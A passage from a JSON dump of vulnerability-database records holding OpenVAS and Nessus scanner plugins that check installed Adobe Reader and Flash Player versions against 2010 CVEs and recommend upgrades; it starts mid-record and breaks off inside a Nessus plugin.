value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-2883\", \"CVE-2010-2884\", \"CVE-2010-2887\", \"CVE-2010-2889\", \"CVE-2010-2890\", \"CVE-2010-3619\", \"CVE-2010-3620\", \"CVE-2010-3621\", \"CVE-2010-3622\", \"CVE-2010-3625\", \"CVE-2010-3626\", \"CVE-2010-3627\", \"CVE-2010-3628\", \"CVE-2010-3629\", \"CVE-2010-3630\", \"CVE-2010-3632\", \"CVE-2010-3654\", \"CVE-2010-3656\", \"CVE-2010-3657\", \"CVE-2010-3658\", \"CVE-2010-4091\");\n script_name(\"Gentoo Security Advisory GLSA 201101-08 (acroread)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities in Adobe Reader might result in the execution of\n arbitrary code.\");\n script_tag(name:\"solution\", value:\"All Adobe Reader users should upgrade to the latest stable version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/acroread-9.4.1'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201101-08\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=336508\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=343091\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-21.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-28.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201101-08.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.4.1\"), vulnerable: make_list(\"lt 9.4.1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-09-04T14:20:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4091", "CVE-2010-2887", "CVE-2010-3654", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201101-08.", "modified": "2017-08-29T00:00:00", "published": "2011-03-09T00:00:00", "id": "OPENVAS:69044", "href": "http://plugins.openvas.org/nasl.php?oid=69044", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201101-08 (acroread)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in Adobe Reader might result in the execution of\n arbitrary code.\";\ntag_solution = \"All Adobe Reader users should upgrade to the latest stable version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/acroread-9.4.1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201101-08\nhttp://bugs.gentoo.org/show_bug.cgi?id=336508\nhttp://bugs.gentoo.org/show_bug.cgi?id=343091\nhttp://www.adobe.com/support/security/bulletins/apsb10-21.html\nhttp://www.adobe.com/support/security/bulletins/apsb10-28.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201101-08.\";\n\n \n \n\nif(description)\n{\n script_id(69044);\n script_version(\"$Revision: 7019 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-29 13:51:27 +0200 (Tue, 29 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-09 05:54:11 +0100 (Wed, 09 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-2883\", \"CVE-2010-2884\", \"CVE-2010-2887\", \"CVE-2010-2889\", \"CVE-2010-2890\", \"CVE-2010-3619\", \"CVE-2010-3620\", \"CVE-2010-3621\", \"CVE-2010-3622\", \"CVE-2010-3625\", \"CVE-2010-3626\", \"CVE-2010-3627\", \"CVE-2010-3628\", \"CVE-2010-3629\", \"CVE-2010-3630\", \"CVE-2010-3632\", \"CVE-2010-3654\", \"CVE-2010-3656\", \"CVE-2010-3657\", \"CVE-2010-3658\", \"CVE-2010-4091\");\n script_name(\"Gentoo Security Advisory GLSA 201101-08 (acroread)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.4.1\"), vulnerable: make_list(\"lt 9.4.1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3624", "CVE-2010-3623", "CVE-2010-3631"], "description": "This host is installed with Adobe Reader and is prone to denial of service and\ncode execution vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2014-04-16T00:00:00", "id": "OPENVAS:1361412562310804263", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804263", "type": "openvas", "title": "Adobe Reader Denial of Service & Code Execution Vulnerabilities (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_dos_n_code_exec_vuln_macosx.nasl 11867 2018-10-12 10:48:11Z cfischer $\n#\n# Adobe Reader Denial of Service & Code Execution Vulnerabilities (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804263\");\n script_version(\"$Revision: 11867 $\");\n script_cve_id(\"CVE-2010-3623\", \"CVE-2010-3631\", \"CVE-2010-3624\");\n script_bugtraq_id(43731, 43733, 43736);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:48:11 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-16 11:35:51 +0530 (Wed, 16 Apr 2014)\");\n script_name(\"Adobe Reader Denial of Service & Code Execution Vulnerabilities (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to denial of service and\ncode execution vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaws exist due to,\n\n - An array-indexing error when parsing protocol handler parameters.\n\n - An input validation error when parsing images.\n\n - Improper sanitization of certain unspecified user-supplied input.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code or\ncause a denial of service.\");\n script_tag(name:\"affected\", value:\"Adobe Reader version 8.x before 8.2.5 and 9.x before 9.4 on Mac OS X.\");\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader 8.2.5 or 9.4 or later.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/41435\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-21.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Reader/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/reader\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(readerVer && readerVer =~ \"^(8|9)\")\n{\n if(version_in_range(version:readerVer, test_version:\"8.0\", test_version2:\"8.2.4\")||\n version_in_range(version:readerVer, test_version:\"9.0\", test_version2:\"9.3.4\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2887"], "description": "This host is installed with Adobe Reader and is prone to multiple\n unspecified vulnerabilities.", "modified": "2017-02-10T00:00:00", "published": "2010-10-18T00:00:00", "id": "OPENVAS:801525", "href": "http://plugins.openvas.org/nasl.php?oid=801525", "type": "openvas", "title": "Adobe Reader Multiple Unspecified Vulnerabilities -Oct10 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_mult_unspecified_oct10_lin.nasl 5263 2017-02-10 13:45:51Z teissa $\n#\n# Adobe Reader Multiple Unspecified Vulnerabilities -Oct10 (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let attackers to gain privileges via unknown\n vectors.\n Impact Level:Application\";\ntag_affected = \"Adobe Reader version 8.x before 8.2.5 and 9.x before 9.4 on linux\";\ntag_insight = \"An unspecified flaw is present in the application which can be exploited\n through an unknown attack vectors.\";\ntag_solution = \"Upgrade to Adobe Reader version 9.4 or 8.2.5\n For updates refer to http://www.adobe.com\";\ntag_summary = \"This host is installed with Adobe Reader and is prone to multiple\n unspecified vulnerabilities.\";\n\nif(description)\n{\n script_id(801525);\n script_version(\"$Revision: 5263 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-10 14:45:51 +0100 (Fri, 10 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-10-18 15:37:53 +0200 (Mon, 18 Oct 2010)\");\n script_cve_id(\"CVE-2010-2887\");\n script_bugtraq_id(43740);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Reader Multiple Unspecified Vulnerabilities -Oct10 (Linux)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/41435/\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/2573\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb10-21.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\");\n script_require_keys(\"Adobe/Reader/Linux/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nreaderVer = get_kb_item(\"Adobe/Reader/Linux/Version\");\nif(!readerVer){\n exit(0);\n}\n\n# Check for Adobe Reader version < 8.2.5 and 9.x to 9.3.4\nif(version_is_less(version:readerVer, test_version:\"8.2.5\") ||\n version_in_range(version:readerVer, test_version:\"9.0\", test_version2:\"9.3.4\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2887"], "description": "This host is installed with Adobe Reader and is prone to multiple\n unspecified vulnerabilities.", "modified": "2018-12-04T00:00:00", "published": "2010-10-18T00:00:00", "id": "OPENVAS:1361412562310801525", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801525", "type": "openvas", "title": "Adobe Reader Multiple Unspecified Vulnerabilities -Oct10 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_mult_unspecified_oct10_lin.nasl 12653 2018-12-04 15:31:25Z cfischer $\n#\n# Adobe Reader Multiple Unspecified Vulnerabilities -Oct10 (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801525\");\n script_version(\"$Revision: 12653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 16:31:25 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-10-18 15:37:53 +0200 (Mon, 18 Oct 2010)\");\n script_cve_id(\"CVE-2010-2887\");\n script_bugtraq_id(43740);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Reader Multiple Unspecified Vulnerabilities -Oct10 (Linux)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/41435/\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/2573\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-21.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Linux/Version\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to gain privileges via unknown\n vectors.\");\n script_tag(name:\"affected\", value:\"Adobe Reader version 8.x before 8.2.5 and 9.x before 9.4 on linux\");\n script_tag(name:\"insight\", value:\"An unspecified flaw is present in the application which can be exploited\n through an unknown attack vectors.\");\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader version 9.4 or 8.2.5\");\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to multiple\n unspecified vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nreaderVer = get_kb_item(\"Adobe/Reader/Linux/Version\");\nif(!readerVer){\n exit(0);\n}\n\nif(version_is_less(version:readerVer, test_version:\"8.2.5\") ||\n version_in_range(version:readerVer, test_version:\"9.0\", test_version2:\"9.3.4\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:54:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2884"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-12-21T00:00:00", "published": "2010-10-10T00:00:00", "id": "OPENVAS:136141256231068102", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231068102", "type": "openvas", "title": "FreeBSD Ports: linux-flashplugin", "sourceData": "#\n#VID 8a34d9e6-c662-11df-b2e1-001b2134ef46\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 8a34d9e6-c662-11df-b2e1-001b2134ef46\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n linux-flashplugin\n linux-f8-flashplugin\n linux-f10-flashplugin\n\nCVE-2010-2884\nUnspecified vulnerability in Adobe Flash Player 10.1.82.76 and earlier\nfor Windows, Macintosh, Linux, Solaris; Flash Player 10.1.92.10 for\nAndroid; Reader 9.3.4 for Windows, Macintosh and UNIX; and Acrobat\n9.3.4 and earlier for Windows and Macintosh allows remote attackers to\ncause a denial of service (crash) and execute arbitrary code via\nunknown vectors, as exploited in the wild in September 2010.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.adobe.com/support/security/advisories/apsa10-03.html\nhttp://www.vuxml.org/freebsd/8a34d9e6-c662-11df-b2e1-001b2134ef46.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.68102\");\n script_version(\"$Revision: 8207 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 08:30:12 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-10-10 19:35:00 +0200 (Sun, 10 Oct 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-2884\");\n script_name(\"FreeBSD Ports: linux-flashplugin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"linux-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0r283\")<0) {\n txt += 'Package linux-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-f8-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.1r85\")<0) {\n txt += 'Package linux-f8-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-f10-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.1r85\")<0) {\n txt += 'Package linux-f10-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-17T14:43:08", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. (CVE-2010-2883 / CVE-2010-2884 /\nCVE-2010-2887 / CVE-2010-2889 / CVE-2010-2890 / CVE-2010-3619 /\nCVE-2010-3620 / CVE-2010-3621 / CVE-2010-3622 / CVE-2010-3623 /\nCVE-2010-3624 / CVE-2010-3625 / CVE-2010-3626 / CVE-2010-3627 /\nCVE-2010-3628 / CVE-2010-3629 / CVE-2010-3630 / CVE-2010-3631 /\nCVE-2010-3632 / CVE-2010-3656 / CVE-2010-3657 / CVE-2010-3658)", "edition": 23, "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 7182)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2887", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3624", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-3623", "CVE-2010-3631", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "modified": "2011-01-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_ACROREAD_JA-7182.NASL", "href": "https://www.tenable.com/plugins/nessus/51715", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51715);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-2883\", \"CVE-2010-2884\", \"CVE-2010-2887\", \"CVE-2010-2889\", \"CVE-2010-2890\", \"CVE-2010-3619\", \"CVE-2010-3620\", \"CVE-2010-3621\", \"CVE-2010-3622\", \"CVE-2010-3623\", \"CVE-2010-3624\", \"CVE-2010-3625\", \"CVE-2010-3626\", \"CVE-2010-3627\", \"CVE-2010-3628\", \"CVE-2010-3629\", \"CVE-2010-3630\", \"CVE-2010-3631\", \"CVE-2010-3632\", \"CVE-2010-3656\", \"CVE-2010-3657\", \"CVE-2010-3658\");\n\n script_name(english:\"SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 7182)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. (CVE-2010-2883 / CVE-2010-2884 /\nCVE-2010-2887 / CVE-2010-2889 / CVE-2010-2890 / CVE-2010-3619 /\nCVE-2010-3620 / CVE-2010-3621 / CVE-2010-3622 / CVE-2010-3623 /\nCVE-2010-3624 / CVE-2010-3625 / CVE-2010-3626 / CVE-2010-3627 /\nCVE-2010-3628 / CVE-2010-3629 / CVE-2010-3630 / CVE-2010-3631 /\nCVE-2010-3632 / CVE-2010-3656 / CVE-2010-3657 / CVE-2010-3658)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2883.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2884.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2887.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2889.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2890.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3619.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3620.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3621.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3622.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3623.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3624.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3625.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3626.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3627.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3628.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3629.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3630.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3631.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3632.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3656.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3657.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3658.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7182.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", 